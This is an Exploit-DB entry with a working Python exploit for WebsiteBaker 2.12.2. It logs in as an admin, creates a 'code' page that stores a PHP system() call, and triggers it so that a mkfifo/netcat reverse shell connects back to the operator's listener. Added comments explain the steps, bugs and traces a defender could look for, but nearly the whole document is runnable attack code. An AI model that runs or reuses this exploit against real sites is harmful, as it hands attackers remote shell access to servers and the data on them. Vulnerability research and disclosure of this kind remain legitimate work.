WebsiteBaker 2.12.2 - Remote Code Execution

EDB-ID:

48838

CVE:

N/A


Author:

Enesdex

Type:

webapps


Platform:

PHP

Date:

2020-09-29


# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution
# Date: 2020-07-04
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://websitebaker.org/pages/en/home.php
# Software Link: https://wiki.websitebaker.org/doku.php/downloads
# Version: 2.12.2
# Tested on: Windows 10 and Ubuntu 18.04 
# Note : Start a listener (e.g. netcat) before running the exploit, then provide the listener IP and port

import requests
import re
from bs4 import BeautifulSoup
import sys
import getopt

# Command-line parsing: -t target base URL, -u/-p admin credentials,
# -i/--lhost and -l/--lport for the operator's listener. getopt does not
# enforce that any option is present; a missing -t/-u/-p/-i/-l leaves the
# corresponding name unbound and the script dies later with a NameError
# (lhost/lport are first read when the payload string is built below).
options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport='])

for opt, arg in options:
    # ('-h') is a plain string, not a one-element tuple, so `in` is a
    # substring test here. It only behaves as intended because getopt hands
    # back whole option strings ('-t', '--lhost', ...), never fragments.
    if opt in ('-h'): 
        print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT')
        exit()  # site-module exit(); sys.exit() is the conventional form in scripts
    elif opt in ('-t'):
        main_url = arg
    elif opt in ('-u'):
        usr = arg
    elif opt in ('-p'):
        passwd = arg
    elif opt in ('-i', '--lhost'):
    	lhost = arg
    elif opt in ('-l' , '--lport'):
    	lport = arg

# Payload: a POSIX reverse shell (mkfifo + /bin/sh piped through nc), so the
# *target* has to be a Unix host with nc installed; the "Windows 10" in the
# header can therefore only describe the operator machine. lhost/lport are
# spliced in verbatim with no quoting or validation.
reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f"
# Wrapped in a PHP system() call; this string becomes the body of the "code"
# page created below, i.e. the vulnerability is that an authenticated admin
# can store arbitrary PHP through the code module and have it served as a page.
shell_code_eval = "echo system('"+ reverse_shell_code + "');"


print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n")
## LOGIN PAGE: scrape the form's hidden inputs by position. Indices 1 and 2
## are hidden inputs whose *values* are the real field names for the username
## and password inputs (see the login POST, where username_par/password_par
## are used as keys); index 3 is a name/value pair echoed back unchanged,
## presumably an anti-CSRF/form token -- TODO confirm against the template.
## Hard-coded indices make this break on any change to the login template.
url = main_url+"/admin/login/index.php"
req = requests.get(url)

login_page = req.text
soup = BeautifulSoup(login_page, 'html.parser')
username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value']
password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value']
weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name']
weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value']

# LOGIN to obtain the session cookie. `login_page` is rebound here from the
# HTML text above to a requests.Session object.
login_page = requests.Session()

burp0_url = main_url+"/admin/login/index.php"
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr,  password_par : passwd, "submit": ''}
# allow_redirects=False so the Set-Cookie of the login response itself is
# inspected rather than that of whatever page it redirects to.
r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False)

# Dict-style access raises KeyError if the response carries no Set-Cookie
# header (e.g. when the credentials are rejected); there is no error handling.
cok = r.headers['Set-Cookie']
# Keep only the first "name=value" attribute of the first cookie; any further
# cookies or attributes in the header are discarded.
cok = cok.split(' ')[0]  
cookie_par = cok.split('=')[0]
cookie_val = cok.split('=')[1].replace(';','')
session_cookie = cookie_par + "=" + cookie_val  # assembled but never used below


## PAGES ADMIN INDEX: grab hidden input 0 (name and value), again presumably
## a form token that add.php expects -- TODO confirm.
url = main_url+"/admin/pages/index.php"
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
create_page = req.text
soup = BeautifulSoup(create_page, 'html.parser')
weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name']
weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value']

## CREATE A "code" PAGE titled "exploit-shell" via /admin/pages/add.php.
## Artifacts a defender can look for: a new page with this title in the
## admin page list and the generated /pages/exploit-shell.php requested at
## the end of the script. `create_page` is rebound from HTML text to a
## Session; each requests.session() in this script is fresh and the cookie is
## passed explicitly per request, so the Session objects carry no shared state.
create_page = requests.session()

burp0_url = main_url+"/admin/pages/add.php"
burp0_cookies = {cookie_par : cookie_val}
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"}
c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

## FIND THE PAGE ID: re-fetch the pages index and take the value of the
## <option> whose text is exactly "exploit-shell". IndexError if the page
## was not created (e.g. the add request failed); the response `c` is not checked.
url = main_url+"/admin/pages/index.php"
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
find_id = req.text
soup = BeautifulSoup(find_id, 'html.parser')
pageid = soup.find_all('option',string='exploit-shell')[0]['value']

## MODIFY PAGE: load the editor for the new page and take hidden input 3
## (name/value), presumably the token save.php expects -- TODO confirm.
url = main_url+'/admin/pages/modify.php?page_id='+pageid
cookies = {cookie_par : cookie_val}
req = requests.get(url, cookies=cookies)
add_shellcode = req.text
soup = BeautifulSoup(add_shellcode, 'html.parser')
weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name']
weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value']

## STORE THE PAYLOAD through the code module's save endpoint. The PHP string
## built above is sent as the page "content". section_id is set equal to
## page_id, which assumes the new page's single section shares its id --
## TODO confirm; a mismatch would write to the wrong (or no) section.
session = requests.session()

burp0_url = main_url+"/modules/code/save.php"
burp0_cookies = {cookie_par : cookie_val}
burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval}
a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

# TRIGGER: request the public page so the stored PHP is rendered and, by
# design, the reverse shell connects out to lhost:lport. The response is
# ignored; `cookies` here is the dict left over from the modify step (same values).
last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)